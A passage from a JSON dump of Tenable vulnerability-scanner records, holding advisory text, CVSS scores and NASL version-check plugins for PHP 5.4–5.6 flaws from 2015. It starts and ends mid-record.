make_list(\"12.0.0\",\"11.6.0\",\"11.0.0-11.5.3\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.1\",\"11.5.4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.3.0-11.5.3\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:29", "description": "03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long timeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST data). (cmb) * Fixed bug #70198 (Checking liveness does not work as expected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use After Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219 (Use after free vulnerability in session deserializer). (taoguangchen at icloud dot com) **CLI server:** * Fixed bug #66606 (Sets HTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug #70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug #70266 (DateInterval::__construct.interval_spec is not supposed to be optional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring text after null byte). (cmb) **EXIF:** * Fixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD tag byte value of 32 bytes). (Stas) **hash:** * Fixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug #69833 (mcrypt fd caching not working). (Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232 (Incorrect bump-along behavior with \\K and empty string match). (cmb) * Fixed bug #70345 (Multiple vulnerabilities related to PCRE functions). (Anatol Belski) **SOAP:** * Fixed bug #70388 (SOAP serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref (segfault) in spl_autoload via ob_start). (hugh at allthethings dot co dot nz) * Fixed bug #70303 (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability in unserialize() with SplObjectStorage). (taoguangchen at icloud dot com) * Fixed bug #70366 (Use-after-free vulnerability in unserialize() with SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails for very large and very small WBMP). (cmb) * Fixed bug #70157 (parse_ini_string() segmentation fault with INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782 (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-21T00:00:00", "type": "nessus", "title": "Fedora 23 : php-5.6.13-1.fc23 (2015-14978)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2015-14978.NASL", "href": "https://www.tenable.com/plugins/nessus/86030", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-14978.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86030);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"FEDORA\", value:\"2015-14978\");\n\n script_name(english:\"Fedora 23 : php-5.6.13-1.fc23 (2015-14978)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long\ntimeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST\ndata). (cmb) * Fixed bug #70198 (Checking liveness does not work as\nexpected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use\nAfter Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219\n(Use after free vulnerability in session deserializer). (taoguangchen\nat icloud dot com) **CLI server:** * Fixed bug #66606 (Sets\nHTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug\n#70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug\n#70266 (DateInterval::__construct.interval_spec is not supposed to be\noptional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring\n text after null byte). (cmb) **EXIF:** * Fixed bug\n #70385 (Buffer over-read in exif_read_data with TIFF IFD\n tag byte value of 32 bytes). (Stas) **hash:** * Fixed\n bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug\n #69833 (mcrypt fd caching not working). (Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and\n do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232\n (Incorrect bump-along behavior with \\K and empty string\n match). (cmb) * Fixed bug #70345 (Multiple\n vulnerabilities related to PCRE functions). (Anatol\n Belski) **SOAP:** * Fixed bug #70388 (SOAP\n serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref\n (segfault) in spl_autoload via ob_start). (hugh at\n allthethings dot co dot nz) * Fixed bug #70303\n (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability\n in unserialize() with SplObjectStorage). (taoguangchen\n at icloud dot com) * Fixed bug #70366 (Use-after-free\n vulnerability in unserialize() with\n SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails\n for very large and very small WBMP). (cmb) * Fixed bug\n #70157 (parse_ini_string() segmentation fault with\n INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782\n (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260674\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260748\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166632.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bfa72a25\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"php-5.6.13-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:23", "description": "Versions of PHP 5.4.x prior to 5.4.45, 5.5.x prior to 5.5.29, or 5.6.x prior to 5.6.13 are vulnerable to the following issues :\n\n - A use-after-free error exists in the unserialize() function in 'ext/spl/spl_observer.c'. The issue is triggered as user-supplied input is not sanitized. This may allow a remote attacker to dereference already freed memory and potentially execute arbitrary code.\n - A type confusion flaw affects the serialize_function_call() function in 'ext/soap/soap.c'. The issue is triggered when handling input passed via the header field. This may allow a remote attacker to execute arbitrary code.\n - A use-after-free error affects the object_custom() function in 'ext/standard/var_unserializer.c'. The issue is triggered when handling user-supplied input. This may allow a remote attacker to dereference already freed memory and potentially execute arbitrary code.\n - A use-after-free error affects the unserialize() function in 'ext/spl/spl_dllist.c'. The issue is triggered during the deserialization of user-supplied input. This may allow a remote attacker to dereference already freed memory and potentially execute arbitrary code.\n - An out-of-bounds read flaw in the exif_process_IFD_TAG() function in 'ext/exif/exif.c' that is triggered when handling TIFF IFD tags. This may allow a context-dependent attacker to crash an application linked against PHP or potentially disclose memory contents.\n - An overflow condition exists in the php_pcre_match_impl() function in 'ext/pcre/php_pcre.c'. The issue is triggered as user-supplied input is not properly validated. This may allow a remote attacker to cause a heap-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.\n - A flaw exists in the php_pcre_split_impl() function in 'ext/pcre/php_pcre.c'. The flaw is triggered during the handling of offsets that consist of a start and end position within the subject string, which can cause an exhaustion of memory resources. This may allow a remote attacker to exhaust available memory.\n - An overflow condition affects the php_pcre_replace_impl() function in 'ext/pcre/php_pcre.c'. The issue is triggered as user-supplied input is not properly validated when handling offsets. This may allow a remote attacker to cause a heap-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.\n - A use-after-free error exists in the php_var_unserialize() function of the session deserializer (php_binary/php_serialize). The issue is triggered when deserializing multiple forms of data. This may allow a remote attacker to dereference already freed memory and potentially execute arbitrary code.\n - A NULL pointer dereference flaw exists in the xsl_ext_function_php() function in 'ext/xsl/xsltprocessor.c' that is triggered as checks are not properly performed on user-supplied input. This may allow a remote attacker to cause a denial of service.\n - A flaw exists that allows traversing outside of a restricted path. The issue is due to the php_zip_extract_file() function in 'ext/zip/php_zip.c' not properly sanitizing user input, specifically path traversal style attacks (e.g. '../') passed to the ZipArchive::extractTo() method. This may allow a remote attacker to create arbitrary directories.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-14T00:00:00", "type": "nessus", "title": "PHP 5.4.x < 5.4.45 / 5.5.x < 5.5.29 / 5.6.x < 5.6.13 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6834", "CVE-2015-6835"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "8861.PRM", "href": "https://www.tenable.com/plugins/nnm/8861", "sourceData": "Binary data 8861.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:04:14", "description": "According to its banner, the version of PHP running on the remote web server is 5.5.x prior to 5.5.29. It is, therefore, affected by the following vulnerabilities :\n\n - A directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c could allow a remote attacker to create arbitrary empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to the unserialize() function. A remote attacker can exploit these errors to execute arbitrary code.\n (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the php_var_unserialize() function. A remote attacker, using a crafted serialize string, can exploit this to execute arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the serialize_function_call() function due to improper validation of the headers field. A remote attacker can exploit this to have unspecified impact. (CVE-2015-6836)\n\n - Multiple flaws exist in the XSLTProcessor class due to improper validation of input from the libxslt library. A remote attacker can exploit thse flaws to have an unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function in file php_zip.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to create arbitrary directories outside of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2015-09-10T00:00:00", "type": "nessus", "title": "PHP 5.5.x < 5.5.29 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_5_29.NASL", "href": "https://www.tenable.com/plugins/nessus/85886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85886);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-9767\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\"\n );\n script_bugtraq_id(\n 76644,\n 76649,\n 76652,\n 76733,\n 76734,\n 76738\n );\n\n script_name(english:\"PHP 5.5.x < 5.5.29 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 5.5.x prior to 5.5.29. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c\n could allow a remote attacker to create arbitrary\n empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to\n the unserialize() function. A remote attacker can\n exploit these errors to execute arbitrary code.\n (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the\n php_var_unserialize() function. A remote attacker, using\n a crafted serialize string, can exploit this to execute\n arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the\n serialize_function_call() function due to improper\n validation of the headers field. A remote attacker can\n exploit this to have unspecified impact. (CVE-2015-6836)\n\n - Multiple flaws exist in the XSLTProcessor class due to\n improper validation of input from the libxslt library. A\n remote attacker can exploit thse flaws to have an\n unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function\n in file php_zip.c due to improper sanitization of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this to create arbitrary directories outside\n of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.5.29\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.5.29 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6836\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.5)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.5\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.5.x\", port);\n\nif (version =~ \"^5\\.5\\.([0-9]|1[0-9]|2[0-8])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 5.5.29' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:04:14", "description": "According to its banner, the version of PHP running on the remote web server is 5.6.x prior to 5.6.13. It is, therefore, affected by multiple vulnerabilities :\n\n - A directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c could allow a remote attacker to create arbitrary empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to the unserialize() function, which a remote attacker can exploit to execute arbitrary code. (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the php_var_unserialize() function. A remote attacker, using a crafted serialize string, can exploit this to execute arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the serialize_function_call() function due to improper validation of the headers field, which a remote attacker can exploit to have unspecified impact. (CVE-2015-6836)\n\n - A flaw exists in the XSLTProcessor class due to improper validation of input from the libxslt library, which a remote attacker can exploit to have an unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function in file php_zip.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to create arbitrary directories outside of the restricted path.\n\n - A NULL pointer dereference flaw exists in the spl_autoload() function in file php_spl.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a PHP application to crash.\n\n - A flaw exists in the parse_ini_file() and parse_ini_string() functions due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a PHP application to crash.\n\n - A flaw exists in the CLI SAPI Web Server due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to access arbitrary files outside of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2015-09-10T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.13 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_6_13.NASL", "href": "https://www.tenable.com/plugins/nessus/85887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85887);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-9767\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\"\n );\n script_bugtraq_id(\n 76644,\n 76649,\n 76652,\n 76733,\n 76734,\n 76738\n );\n\n script_name(english:\"PHP 5.6.x < 5.6.13 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 5.6.x prior to 5.6.13. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c\n could allow a remote attacker to create arbitrary\n empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to\n the unserialize() function, which a remote attacker can\n exploit to execute arbitrary code. (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the\n php_var_unserialize() function. A remote attacker, using\n a crafted serialize string, can exploit this to execute\n arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the\n serialize_function_call() function due to improper\n validation of the headers field, which a remote attacker\n can exploit to have unspecified impact. (CVE-2015-6836)\n\n - A flaw exists in the XSLTProcessor class due to\n improper validation of input from the libxslt library,\n which a remote attacker can exploit to have an\n unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function\n in file php_zip.c due to improper sanitization of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this to create arbitrary directories outside\n of the restricted path.\n\n - A NULL pointer dereference flaw exists in the\n spl_autoload() function in file php_spl.c due to\n improper sanitization of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a PHP application to crash.\n\n - A flaw exists in the parse_ini_file() and\n parse_ini_string() functions due to improper\n sanitization of user-supplied input. An unauthenticated,\n remote attacker can exploit this to cause a PHP\n application to crash.\n\n - A flaw exists in the CLI SAPI Web Server due to improper\n sanitization of user-supplied input. An unauthenticated,\n remote attacker can exploit this to access arbitrary\n files outside of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.6.13 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6836\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nif (version =~ 